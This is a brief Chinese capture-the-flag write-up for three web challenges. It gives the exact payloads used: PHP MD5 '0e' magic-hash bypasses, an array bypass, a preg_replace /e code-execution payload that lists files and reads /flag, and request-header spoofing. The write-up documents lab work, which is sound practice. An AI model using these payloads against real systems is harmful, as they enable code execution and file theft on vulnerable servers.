[Solved]Warm up

第一个是经典的0e绕过,?val1=QNKCDZO&val2=240610708

$$md5 == md5$$md5)用特殊字符串&md5=0e215962017

第三个利用$XYCTF可以被复写,保证xyctf和xy相同即可,md5编码XYCTF_550102591发现是0e打头,用0e绕过即可,&XYCTF=240610708&XY=240610708

接下来访问LLeeevvveeelll222.php

第一个if用到了interval,post,利用数组绕过a[]=a

echo preg_replace($_GET['a'],$_GET['b'],$_GET['c']);查阅资料得知a处正则用/e方式读取可以执行命令,payload:?a=/re/e&b=print_r(scandir('.'))&c=re读取到flag在根目录,&b=highlight_file(‘/flag’)读取flag

[Solved]ezhttp

robots.txt->拿到账号密码

hackbar一路修改请求头即可

特殊之处在于X-Forward-F被过滤,用Client-ip

代理用Via

ezmd5

传入两张同样的图片,返回{“areEqual”:false,”md5Equal”:true,”md5_1”:”af6794c93d1157c0688d6cc5600b8cae”,”md5_2”:”af6794c93d1157c0688d6cc5600b8cae”}

从网上查阅到两个MD5值相同但是图片不同的特例:

上传后得到flag